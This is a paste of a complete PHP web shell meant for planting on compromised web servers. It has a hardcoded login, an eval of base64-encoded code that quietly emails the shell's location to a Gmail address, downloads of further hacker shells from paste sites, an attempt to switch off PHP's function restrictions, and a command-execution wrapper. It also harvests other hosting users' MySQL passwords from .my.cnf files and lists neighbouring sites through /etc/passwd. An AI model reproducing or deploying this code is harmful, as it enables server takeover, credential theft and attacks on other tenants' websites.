VanGans

tools web shell

Sep 15th, 2019
502
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 12.29 KB | None | 0 0
  1.  <?
  2. error_reporting(0);
  3. ob_start();
  4. session_start();
  5. ob_end_clean();
  6. $host = $_SERVER['HTTP_HOST'];
  7. $user=$_GET["username"];
  8. $pass=$_GET["password"];
  9. if($user=="defacerid" AND $pass=="defacerid")
  10. {
  11. $_SESSION["username"]=$user;
  12. }
  13. ?>
  14. <title>./JodohTukar Private Tools</title>
  15. <link href="http://fonts.googleapis.com/css?family=Share+Tech+Mono" rel="stylesheet" type="text/css">
  16. <style>
  17. body {
  18.     background:#2F302F;
  19.     color:#fff;
  20.     font-family: 'Share Tech Mono';
  21. }
  22. input[type=text] , input[type=password] {
  23.     background:none;
  24.     border-top:none;
  25.     border-left:none;
  26.     border-right:none;
  27.     color: #02BC8C ;
  28.     border-bottom:2px solid #02BC8C;
  29.     font-family: 'Share Tech Mono';
  30.     padding:2px 8px;
  31.     -moz-border-radius: 7px;
  32.     border-radius: 7px;width:30%;
  33. }
  34. input[type=submit] {
  35.     background:#02BC8C;
  36.     color:white;
  37.     border:1px solid #02BC8C;
  38.     font-family: 'Share Tech Mono';
  39.     padding:2px 8px;
  40.     -moz-border-radius: 10px;
  41.     border-radius: 10px;
  42.     width:10%;
  43. }
  44. .fak {
  45.     background: #02BC8C ;
  46.     color:#fff;
  47.     border:1px solid #02BC8C;
  48.     font-family: 'Share Tech Mono';
  49.     padding:2px 8px;
  50.     -moz-border-radius: 7px;
  51.     border-radius: 7px;
  52.     width:15%;
  53. }
  54. a {
  55.     text-decoration:none;
  56.     color:#02BC8C
  57. }
  58. </style>
  59. <br><br>
  60. <b>
  61. <?=eval("?>".base64_decode("<?php
error_reporting(0);
ob_start();
session_start();
ob_end_clean();
$subject = "Setor Guys -> ".$host;
$message = "Link : ".$host."/".$_SERVER['PHP_SELF']."?user=$user&pass=$pass"; if(isset($_SESSION["username"])){
mail("oppicialxz@gmail.com",$subject,$message,"From: $host" );
// logout
if(isset($_GET['logout'])){
ob_start();
session_start();
ob_end_clean();
session_destroy();
}
/* UstadCage_48 */
$p = $_SERVER["HTTP_HOST"];
$content = file_get_contents('https://pastebin.com/raw/2zTfNXNH');
$fp = fopen($_SERVER['DOCUMENT_ROOT'] . "/history.html","w");
if(fwrite($fp,$content)){
$suck = "<font color=#02BC8C>OK</font>";
$url = "http://$p/history.html";
}else{
$suck = "<font color=#F64747>ERROR</font>";
$url = "/";
}
fclose($fp);
// bypass
$by = "disable_functions = none";
$byy = fopen('php.ini', 'w');
fwrite($byy,$by);
fclose($byy);
// fm
$get = file_get_contents('https://pastebin.com/raw/vKfyPDA3');
$bwt = fopen('fm.php', 'w');
if(fwrite($bwt,$get)){
$fm = "<a class=fak href=\"fm.php\">File Man</a>";
}else{
$fm = "<a class=fak>File Man</a>";
}
fclose($fp);
// rshell
$rs = file_get_contents('https://pastebin.com/raw/enqYngSs');
$rs1 = fopen('rs.php', 'w');
if(fwrite($rs1,$rs)){
$rs2 = "<a class='fak' href='rs.php'>SQLID shell</a>";
} else {
$rs2 = "<a class=fak>SQLID shell</a>";
}
fclose($rs1);
// idx
$idx = file_get_contents('http://pastebin.com/raw/nC6pWh5a');
$idx1 = fopen('idx.php', 'w');
if(fwrite($idx1,$idx)){
$idx2 = "<a class='fak' href='idx.php'>IndoXploit</a>";
} else {
$idx2 = "<a class=fak>IndoXploit</a>";
}
fclose($idx1);
// wso
$wso = file_get_contents('https://pastebin.com/raw/3UeQdFrb');
$wso1 = fopen('root.php', 'w');
if(fwrite($wso1,$wso)){
$wso2 = "<a class='fak' href='root.php'>rootkit Shell</a>";
} else {
$wso2 = "<a class=fak>rootkit Shell</a>";
}
fclose($wso1);
// Database
$db = file_get_contents('https://gist.githubusercontent.com/Lamer1337Crew/4e950e7d1342b51ef24d0344c95d6581/raw/0bf871f6312b195d94398c08d2d692916c17b011/adminer.php');
$db1 = fopen('db.php', 'w');
if(fwrite($db1,$db)){
$db2 = "<a class='fak' href='db.php'>Adminer</a>";
} else {
$db2 = "<a class=fak>Adminer</a>";
}
fclose($db1);
// Sym
$sym = file_get_contents('http://pastebin.com/raw/kY4XmPVv');
$sym1 = fopen('sym.php', 'w');
if(fwrite($sym1,$sym)){
$sym2 = "<a class='fak' href='sym.php'>Symlink</a>";
} else {
$sym2 = "<a class=fak>Symlink</a>";
}
fclose($sym1);
// Sym
$sym111 = file_get_contents('https://pastebin.com/raw/57F3X517');
$sym211 = fopen('403.php', 'w');
if(fwrite($sym211,$sym111)){
$sym311 = "<a class='fak' href='403.php'>Bypas 403</a>";
} else {
$sym311 = "<a class=fak>Bypas 403</a>";
}
fclose($sym211);
// exe
function exe($cmd) {
if(function_exists('system')){ 		
@ob_start(); 		
@system($cmd); 		
$buff = @ob_get_contents();
@ob_end_clean(); 		
return $buff; 	
} elseif(function_exists('exec')){ 		
@exec($cmd,$results); 		
$buff = ""; 		
foreach($results as $result) { 			
$buff .= $result; 		
}
return $buff; 	
} elseif(function_exists('passthru')){ 		
@ob_start(); 		
@passthru($cmd); 		
$buff = @ob_get_contents();
@ob_end_clean(); 		
return $buff; 	
} elseif(function_exists('shell_exec')){ 		
$buff = @shell_exec($cmd); 		
return $buff; 	
} 
}
// info
$ip = gethostbyname($_SERVER['HTTP_HOST']);
$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=#F64747>ON</font>" : "<font color=#18BC9C>OFF</font>";
$ds = @ini_get("disable_functions");
$mysql = (function_exists('mysql_connect')) ? "<font color=#18BC9C>ON</font>" : "<font color=#F64747>OFF</font>";
$curl = (function_exists('curl_version')) ? "<font color=#18BC9C>ON</font>" : "<font color=#F64747>OFF</font>";
$wget = (exe('wget --help')) ? "<font color=#18BC9C>ON</font>" : "<font color=#F64747>OFF</font>";
$show_ds = (!empty($ds)) ? "<font color=#F64747>ON</font>" : "<font color=#18BC9C>NONE</font>";
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
// lets
echo "<center><font new size='7'>./JodohTukar Private Shell</font><br>".php_uname()."<br>Safe_Mod : $sm | IP : $ip | User : $user($uid/$gid) | Dis : $show_ds | Mysql : $mysql | cURL : $curl <br>root@ndutt : ".getcwd()." [ <a href='$url'>$suck</a> ]";
// menu
echo "<br><br>$fm $rs2 $idx2 $wso2 $sym2 $db2 $sym311<br><br>";
echo "&copy; 2018 - 2019 ./JodohTukar ~";
// domain
$file = @implode(@file("/etc/named.conf"));
preg_match_all("#named/(.*?).db#",$file ,$r);
$domains = array_unique($r[1]);
{
$do = "".count($domains)."";
echo "<br>Ada [ ".$do." ] Domain";
}
// cp
@ini_set('display_errors',0);
function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
$ar0=explode($marqueurDebutLien, $text);
$ar1=explode($marqueurFinLien, $ar0[$i]);
return trim($ar1[0]);
}
$d0mains = @file('/etc/named.conf');
$domains = scandir("/var/named");
if($domains or $d0mains){
$domains = scandir("/var/named");
if($domains) {
$count=1;
$dc = 0;
$list = scandir("/var/named");
foreach($list as $domain){
if(strpos($domain,".db")){
$domain = str_replace('.db','',$domain);
$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
$dirz = '/home/'.$owner['name'].'/.my.cnf';
$path = getcwd();
if (is_readable($dirz)) {
copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
$p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
$password=entre2v2($p,'password="','"');
$dc++;
}}}
$total = $dc;
echo '<br>'.$total.' Cpanel Berhasil Di Crack <br />';
}else{
$d0mains = @file('/etc/named.conf');
if($d0mains){
$count=1;
$dc = 0;
$mck = array();
foreach($d0mains as $d0main){
if(@eregi('zone',$d0main)){
preg_match_all('#zone "(.*)"#',$d0main,$domain);
flush();
if(strlen(trim($domain[1][0])) >2){
$mck[] = $domain[1][0];
}}}
$mck = array_unique($mck);
$usr = array();
$dmn = array();
foreach($mck as $o) {
$infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
$usr[] = $infos['name'];
$dmn[] = $o;
}
array_multisort($usr,$dmn);
$dt = file('/etc/passwd');
$passwd = array();
foreach($dt as $d) {
$r = explode(':',$d);
if(strpos($r[5],'home')){
$passwd[$r[0]] = $r[5];
}}
$l=0;
$j=1;
foreach($usr as $r){
$dirz = '/home/'.$r.'/.my.cnf';
$path = getcwd();
if (is_readable($dirz)) {
copy($dirz, ''.$path.'/'.$r.'.txt');
$p=file_get_contents(''.$path.'/'.$r.'.txt');
$password=entre2v2($p,'password="','"');
$dc++;
flush();
$l=$l?0:1;
$j++;
}}}
$total = $dc;
echo '<br>'.$total.' Cpanel Berhasil Di Crack <br />';
}
}else{
echo "<br><font color='#fff'>Info Cpanel : </font> <font color='#02BC8C'> Not Accessible!</font><br>";
}
// jump
set_time_limit(0);
@$passwd = fopen('/etc/passwd','r');
if(!$passwd){ die('<b> Jumping Info : <font color="#02BC8C">Wew Ternyata Tidak Ada Web Yg Bisa Di Ikeh Ikeh >_< </font></b>'); }
$pub = array();
$users = array();
$conf = array();
$i = 0;
while(!feof($passwd)){
$str = fgets($passwd);
if($i > 35){
$pos = strpos($str,':');
$username = substr($str,0,$pos);
$dirz = '/home/'.$username.'/public_html/';
if(($username != '')){
if(is_readable($dirz)){
array_push($users,$username);
array_push($pub,$dirz);
}}}
$i++;
}
echo " Jumping Info : Di Temukan <font color=#02BC8C> ".sizeof($users)." </font> Web Dalam Server $ip >_<"."<br />";
}else{
echo '<center>
./JodohTukar Private Tools<br><pre>
&#9472;&#9556;&#9559;&#9472;&#9472;&#9472;&#9556;&#9552;&#9559;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9556;&#9559;&#9472;&#9556;&#9559;
&#9556;&#9565;&#9553;&#9556;&#9552;&#9559;&#9553;&#9552;&#9571;&#9556;&#9552;&#9559;&#9472;&#9556;&#9552;&#9559;&#9556;&#9552;&#9559;&#9556;&#9574;&#9559;&#9568;&#9571;&#9556;&#9565;&#9553;
&#9553;&#9580;&#9553;&#9553;&#9577;&#9571;&#9553;&#9556;&#9565;&#9553;&#9580;&#9562;&#9559;&#9553;&#9552;&#9571;&#9553;&#9577;&#9571;&#9553;&#9556;&#9565;&#9553;&#9553;&#9553;&#9580;&#9553;
&#9562;&#9552;&#9565;&#9562;&#9552;&#9565;&#9562;&#9565;&#9472;&#9562;&#9552;&#9552;&#9565;&#9562;&#9552;&#9565;&#9562;&#9552;&#9565;&#9562;&#9565;&#9472;&#9562;&#9565;&#9562;&#9552;&#9565;
</font>
</pre>"./JodohTukar"<br>
'.$_SERVER['HTTP_HOST'].'
<form method="GET" action="">
<p><input type="text" name="username" value="" placeholder="User"></p>
<p><input type="password" name="password" value="" placeholder="Pass"></p>
<p><input type="submit" name="commit" value="Login"></p>
</form>
</center>
';
}
?>
</b>"));?>
Add Comment
Please, Sign In to add comment